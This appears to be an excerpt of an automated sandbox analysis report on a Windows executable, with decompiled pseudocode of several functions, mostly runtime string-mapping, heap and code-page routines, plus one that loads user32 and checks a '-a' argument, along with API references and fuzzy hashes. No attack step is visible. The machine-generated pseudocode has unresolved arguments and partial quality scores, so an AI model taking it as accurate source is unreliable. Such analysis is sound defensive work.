Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 0cd5b81671e5551e27e5e7f433cb1ce47f0171a5748ab77f5bca613d86b239ec
Instruction ID: 8e20eb8c947cb56eb6538e6e935b47e269c6269d4d562eacc360eefd0f0f03c9
Opcode Fuzzy Hash: 0cd5b81671e5551e27e5e7f433cb1ce47f0171a5748ab77f5bca613d86b239ec
Instruction Fuzzy Hash: A4F0BB35A00B219BD6312F31BF0EB1A3E54EF057B2B11063EF981B62D0CF788811865D

Uniqueness

Uniqueness Score: -1.00%

Function 00406A7B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00406A7B() {
				int _t41;
				int _t51;
				short* _t53;
				void* _t54;
				int _t59;
				void* _t60;
				short* _t62;

				_t62 =  *(_t60 - 0x18);
				 *(_t60 - 0x24) = 0;
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				_t51 =  *(_t60 - 0x1c);
				if( *(_t60 - 0x24) == 0) {
					L8:
					_t41 = 0;
				} else {
					_t8 = _t60 + 0x14; // 0x406d59
					if(MultiByteToWideChar( *(_t60 + 0x20), 1,  *(_t60 + 0x10),  *_t8,  *(_t60 - 0x24), _t51) == 0) {
						goto L8;
					} else {
						_t59 = LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24), _t51, 0, 0);
						 *(_t60 - 0x28) = _t59;
						if(_t59 == 0) {
							goto L8;
						} else {
							if(( *(_t60 + 0xd) & 0x00000004) == 0) {
								 *(_t60 - 4) = 1;
								E00406590(_t59 + _t59 + 0x00000003 & 0x000000fc, _t54);
								 *(_t60 - 0x18) = _t62;
								_t53 = _t62;
								 *(_t60 - 0x20) = _t53;
								 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
								if(_t53 == 0 || LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24),  *(_t60 - 0x1c), _t53, _t59) == 0) {
									goto L8;
								} else {
									_push(0);
									_push(0);
									if( *(_t60 + 0x1c) != 0) {
										_push( *(_t60 + 0x1c));
										_push( *(_t60 + 0x18));
									} else {
										_push(0);
										_push(0);
									}
									_t59 = WideCharToMultiByte( *(_t60 + 0x20), 0x220, _t53, _t59, ??, ??, ??, ??);
									if(_t59 == 0) {
										goto L8;
									} else {
										goto L17;
									}
								}
							} else {
								if( *(_t60 + 0x1c) == 0 || _t59 <=  *(_t60 + 0x1c) && LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24), _t51,  *(_t60 + 0x18),  *(_t60 + 0x1c)) != 0) {
									L17:
									_t41 = _t59;
								} else {
									goto L8;
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0x10));
				return _t41;
			}

0x00406a7b
0x00406a80
0x00406a83
0x00406a87
0x00406a8d
0x00406af5
0x00406af5
0x00406a8f
0x00406a93
0x00406aa6
0x00000000
0x00406aa8
0x00406aba
0x00406abc
0x00406ac1
0x00000000
0x00406ac3
0x00406ac7
0x00406b09
0x00406b18
0x00406b1d
0x00406b20
0x00406b22
0x00406b25
0x00406b3f
0x00000000
0x00406b59
0x00406b5c
0x00406b5d
0x00406b5e
0x00406b64
0x00406b67
0x00406b60
0x00406b60
0x00406b61
0x00406b61
0x00406b7a
0x00406b7e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b7e
0x00406ac9
0x00406acc
0x00406b84
0x00406b84
0x00000000
0x00000000
0x00000000
0x00406acc
0x00406ac7
0x00406ac1
0x00406aa6
0x00406afd
0x00406b08

APIs

MultiByteToWideChar.KERNEL32(0000000A,00000001,?,?,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406A9E
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406AB4
LCMapStringW.KERNEL32(?,?,00000000,00000000,?,?,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406AE7
LCMapStringW.KERNEL32(?,?,00000000,?,?,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406B4F
WideCharToMultiByte.KERNEL32(0000000A,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00406D59,?), ref: 00406B74

Strings

Ym@, xrefs: 00406A93

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID: Ym@
API String ID: 352835431-983799895
Opcode ID: 0c7727a35f3d2a6c64c548d4000b1fc14add49525af54c34e056693e9adbca60
Instruction ID: 90aa8f12682ce98fd24065ddf6bda3a6ed4d6a0e27dce41ff8fb7d7797b8f12a
Opcode Fuzzy Hash: 0c7727a35f3d2a6c64c548d4000b1fc14add49525af54c34e056693e9adbca60
Instruction Fuzzy Hash: CF112872900209AFDF229F94CD04ADEBBB5FB48350F11816AFA15B21A0D7369D61DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00407304, Relevance: 6.5, APIs: 5, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00407304(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x408710);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x40d528; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x40d524, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x40d118 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E0040534F(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E004052D9(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E00404E3F(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x40d524, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x40c26c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = E00405207(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E00404EDB(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E00405EA0(_v40, _a4, _t74);
													E00404E96(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x40d524, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E00405EA0(_v40, _t97, _t68);
												E00404E96(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E004075DD();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x40d118 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E0040534F(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x40d118 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E004052D9(9);
							_v8 = _t113;
							_t80 = E004040E4(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0040748F();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x40d524, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x40d520; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E004048ED();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E00404438();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E00405EA0(_v40, _t97, _t91);
										_t93 = E004040E4(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E0040410F();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x40d524, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E00405EA0(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E0040410F();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E0040534F(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E004027B7(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = E004028A0(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}

0x00407307
0x00407309
0x0040730e
0x00407319
0x0040731a
0x00407321
0x00407327
0x0040732a
0x0040732e
0x0040733e
0x00407341
0x00407343
0x00407351
0x00407356
0x00407359
0x00407498
0x0040749b
0x004075e8
0x004075e8
0x004075ea
0x004075ed
0x004075ef
0x004075f1
0x004075f5
0x004075f5
0x004075f9
0x004075f9
0x00407605
0x00407605
0x0040760b
0x0040760d
0x00000000
0x00000000
0x0040760f
0x00407615
0x00000000
0x00000000
0x00407618
0x0040761e
0x00407620
0x00000000
0x00000000
0x00000000
0x00407620
0x00000000
0x004075e8
0x004074a1
0x004074a4
0x004074a6
0x004074a8
0x004074b4
0x004074aa
0x004074ad
0x004074ad
0x004074b5
0x004074b5
0x004074b8
0x004074b8
0x004074bb
0x004074be
0x004074c6
0x004074cb
0x004074cc
0x004074dc
0x004074e1
0x004074e4
0x004074e6
0x004074e9
0x004074eb
0x004075ab
0x004074f1
0x004074f1
0x004074f7
0x004074fb
0x00407506
0x0040750b
0x0040750e
0x00407510
0x0040751b
0x00407521
0x00407524
0x00407526
0x0040752b
0x0040752e
0x00407531
0x00407533
0x00407535
0x00407535
0x0040753e
0x0040754a
0x0040754f
0x0040754f
0x00407512
0x00407515
0x00407515
0x00407552
0x00407552
0x00407555
0x00407559
0x00407564
0x0040756a
0x0040756d
0x0040756f
0x00407574
0x00407577
0x0040757a
0x0040757c
0x0040757e
0x0040757e
0x00407585
0x00407591
0x00407596
0x00407596
0x0040756f
0x00407559
0x004075ae
0x004075ae
0x004075ae
0x004075b2
0x004075b2
0x004075b7
0x004075ba
0x004075bc
0x00000000
0x00000000
0x004075be
0x004075c4
0x00000000
0x00000000
0x004075c7
0x004075cd
0x004075cf
0x00000000
0x00000000
0x00000000
0x004075d5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040735f
0x0040735f
0x0040735f
0x00407362
0x00407365
0x0040745c
0x0040745c
0x0040745f
0x00407461
0x00000000
0x00000000
0x00407467
0x0040746d
0x00000000
0x00000000
0x00000000
0x0040746d
0x0040736d
0x00407373
0x00407377
0x0040737d
0x00407380
0x00407382
0x0040742c
0x0040742c
0x00407430
0x00407435
0x00407438
0x0040743a
0x0040743c
0x00407440
0x00407440
0x00407444
0x00407444
0x00407447
0x00407459
0x00407459
0x00000000
0x00407438
0x00407388
0x0040738e
0x00407390
0x00407391
0x00407392
0x00407393
0x00407398
0x0040739b
0x0040739d
0x004073a4
0x004073a5
0x004073ab
0x004073ae
0x004073b0
0x004073b5
0x004073b6
0x004073b9
0x004073bb
0x004073bd
0x004073bd
0x004073c4
0x004073ca
0x004073cf
0x004073d2
0x004073d3
0x004073d4
0x004073d9
0x004073d9
0x0040739f
0x0040739f
0x0040739f
0x0040739d
0x004073dc
0x004073df
0x004073e1
0x004073e3
0x004073e7
0x004073e8
0x004073e8
0x004073ee
0x004073f1
0x004073fc
0x00407402
0x00407405
0x00407407
0x0040740c
0x0040740d
0x00407410
0x00407412
0x00407414
0x00407414
0x0040741b
0x00407420
0x00407421
0x00407424
0x00407429
0x00407429
0x00407407
0x00000000
0x00407473
0x00407474
0x0040747a
0x0040747a
0x00000000
0x00407345
0x00407346
0x00407622
0x00407622
0x00407622
0x00000000
0x00407622
0x00407330
0x00407333
0x00407624
0x00407627
0x00407632
0x00407632

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29819e5374f340cbb359dee31d16c9cb60e7f488e54644d0ec6ebdff1bbf9db0
Instruction ID: c5dd130835414943aa1900cd93d9ad1351b964cf93847c7c967d4d75393204fa
Opcode Fuzzy Hash: 29819e5374f340cbb359dee31d16c9cb60e7f488e54644d0ec6ebdff1bbf9db0
Instruction Fuzzy Hash: CA9106B1C04514AECB21AB69CD419DF7EB8EB44364F20453BF815B62D1D739AD40CAAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404BE3, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BE3() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x40a258 != 0xffffffff) {
					_t43 = HeapAlloc( *0x40d524, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x40a248;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x40a248) {
							HeapFree( *0x40d524, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x40a248) {
						 *_t43 = 0x40a248;
						_t25 =  *0x40a24c; // 0x40a248
						 *(_t43 + 4) = _t25;
						 *0x40a24c = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x40a248 == 0) {
							 *0x40a248 = 0x40a248;
						}
						if( *0x40a24c == 0) {
							 *0x40a24c = 0x40a248;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E00406750(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}

0x00404bee
0x00404c0a
0x00404c0e
0x00000000
0x00000000
0x00000000
0x00404bf0
0x00404bf0
0x00404c14
0x00404c2a
0x00404c2e
0x00404d09
0x00404d0f
0x00404d1a
0x00404d1a
0x00404d20
0x00000000
0x00404d20
0x00404c46
0x00404d03
0x00000000
0x00404d03
0x00404c53
0x00404c73
0x00404c75
0x00404c7a
0x00404c7d
0x00404c86
0x00404c55
0x00404c5c
0x00404c5e
0x00404c5e
0x00404c6a
0x00404c6c
0x00404c6c
0x00404c6a
0x00404c88
0x00404c8e
0x00404c94
0x00404c97
0x00404c97
0x00404c9a
0x00404c9d
0x00404ca0
0x00404ca3
0x00404caa
0x00404cac
0x00404cb6
0x00404cb7
0x00404cb9
0x00404cbc
0x00404cbf
0x00404ccb
0x00404cd3
0x00404cdc
0x00404ce3
0x00404ce6
0x00404ce8
0x00404cef
0x00404cef
0x00000000
0x00404cf7

APIs

HeapAlloc.KERNEL32(00000000,00002020,0040A248,0040A248,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000), ref: 00404C04
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000), ref: 00404C28
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000), ref: 00404C42
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000,?), ref: 00404D03
HeapFree.KERNEL32(00000000,00000000,?,?,004050AF,00000000,00000010,00000000,00000009,00000009,?,0040298A,00000010,00000000,?,00000000), ref: 00404D1A

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: a139a282fdaf2165f2bfe5b1244df2dd12f90868bacabd89215c1e8c5bc2e03b
Instruction ID: 96af8e0c39901950113361bfb5708e0fe0783b740d2323b61ca7482b7fc257a0
Opcode Fuzzy Hash: a139a282fdaf2165f2bfe5b1244df2dd12f90868bacabd89215c1e8c5bc2e03b
Instruction Fuzzy Hash: E73103B15017019FE3308F28DD40B22B7E4EB85755F12823EE655B73E0E778A8548B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405CFE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00405CFE(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x40d2d0,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00406BB6(1,  &_v280, 0x100,  &_v1304,  *0x40d2d0,  *0x40d504, 0);
						E00406967( *0x40d504, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x40d2d0, 0);
						E00406967( *0x40d504, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x40d2d0, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x40d300) =  *(_t55 + 0x40d300) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x40d401) =  *(_t55 + 0x40d401) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x40d300) = _t77;
								goto L16;
							}
							 *(_t55 + 0x40d401) =  *(_t55 + 0x40d401) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x40d300) =  *(_t43 + 0x40d300) & 0x00000000;
						} else {
							 *(_t43 + 0x40d401) =  *(_t43 + 0x40d401) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x40d401) =  *(_t43 + 0x40d401) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x40d300) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x00405d1b
0x00405d21
0x00405d28
0x00405d28
0x00405d2f
0x00405d30
0x00405d34
0x00405d37
0x00405d40
0x00405d79
0x00405d98
0x00405dbc
0x00405de4
0x00405dec
0x00405dee
0x00405df4
0x00405df4
0x00405dfa
0x00405e15
0x00405e27
0x00000000
0x00405e27
0x00405e17
0x00405e1e
0x00405e0a
0x00405e0a
0x00000000
0x00405e0a
0x00405dfc
0x00405e03
0x00000000
0x00405e2e
0x00405e2e
0x00405e30
0x00405e31
0x00000000
0x00405df4
0x00405d44
0x00405d47
0x00405d47
0x00405d4a
0x00405d4f
0x00405d53
0x00405d5a
0x00405d62
0x00405d6c
0x00405d6c
0x00405d6c
0x00405d6f
0x00405d70
0x00405d73
0x00000000
0x00405d78
0x00405e37
0x00405e3e
0x00405e41
0x00405e5f
0x00405e74
0x00405e66
0x00405e66
0x00405e6f
0x00000000
0x00405e6f
0x00405e48
0x00405e48
0x00405e51
0x00405e54
0x00405e54
0x00405e54
0x00405e7b
0x00405e7c
0x00405e82

APIs

GetCPInfo.KERNEL32(?), ref: 00405D12

Strings

, xrefs: 00405D37
, xrefs: 00405D5B

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 91c6b86bf0cdd0c0f68328bb78e02530c482df04dcf8c73d0c98ddc2f6aa9794
Instruction ID: 8d0443081c30802040d5ab737e7d442958efbf745b2bf29103c71d6bb19445fd
Opcode Fuzzy Hash: 91c6b86bf0cdd0c0f68328bb78e02530c482df04dcf8c73d0c98ddc2f6aa9794
Instruction Fuzzy Hash: F94129314046581EEB159754DE59BFB3F99EB02704F1400F6E58AFB1D3C2394A4D8FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401F50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F50(void* __eflags) {
				short _v520;
				intOrPtr _v524;
				intOrPtr _t7;
				CHAR* _t14;

				 *_t14 = 0x52455355;
				_v524 = 0x3233;
				 *0x40cf50 = LoadLibraryA(_t14);
				E00401ED0();
				_t7 =  *0x40cf48; // 0x0
				if(_t7 != 0) {
					L3:
					return 0;
				} else {
					GetModuleFileNameW(0,  &_v520, 0x208);
					if(E004018A0( &_v520, L"-a", 1) == 0) {
						goto L3;
					} else {
						return 1;
					}
				}
			}

0x00401f5a
0x00401f63
0x00401f71
0x00401f76
0x00401f7b
0x00401f82
0x00401fba
0x00401fc2
0x00401f84
0x00401f90
0x00401fac
0x00000000
0x00401fae
0x00401fb9
0x00401fb9
0x00401fac

APIs

LoadLibraryA.KERNEL32 ref: 00401F6B

Part of subcall function 00401ED0: GetProcAddress.KERNEL32 ref: 00401EF8
Part of subcall function 00401ED0: GetConsoleWindow.KERNELBASE ref: 00401F39

GetModuleFileNameW.KERNEL32(00000000,00003233,00000208), ref: 00401F90

Part of subcall function 004018A0: LoadLibraryA.KERNELBASE(?,?,00000000), ref: 004018D8
Part of subcall function 004018A0: GetProcAddress.KERNEL32(00000000,Shel), ref: 004018E4

Strings

32, xrefs: 00401F63

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc$ConsoleFileModuleNameWindow
String ID: 32
API String ID: 3324019085-2103780943
Opcode ID: 46aac531217d429e880bb880db5e2a59e10f4db92b5c2f864625b5ee7c2b489c
Instruction ID: 9c7f662852b17ace4882b67a1fc9ec7ac7ebf9080a2010151e3d34f37eda0402
